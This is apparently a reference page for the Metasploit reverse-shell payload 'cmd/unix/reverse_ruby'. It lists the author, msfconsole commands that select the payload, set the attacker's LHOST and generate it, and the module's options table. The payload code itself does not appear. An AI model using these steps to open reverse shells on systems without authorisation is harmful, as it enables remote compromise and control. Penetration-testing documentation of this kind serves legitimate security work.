Metasploit Penetration Testing Framework
Unix Command Shell, Reverse TCP (via Ruby)
Connect back and create a command shell via Ruby
Rank
Authors
- kris katterjohn < katterjohn [at] gmail.com >
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/cmd/unix/reverse_ruby
msf payload(reverse_ruby) > set LHOST [MY IP ADDRESS]
msf payload(reverse_ruby) > generate
Module Options
| LHOST |
The local address |
| LPORT |
The local port (default: 4444) |
| AutoRunScript |
A script to automatically on session creation. |
| InitialAutoRunScript |
An initial script to run on session created (before AutoRunScript) |
| ReverseConnectRetries |
The number of connection attempts to try before exiting the process |
| WORKSPACE |
Specify the workspace for this module |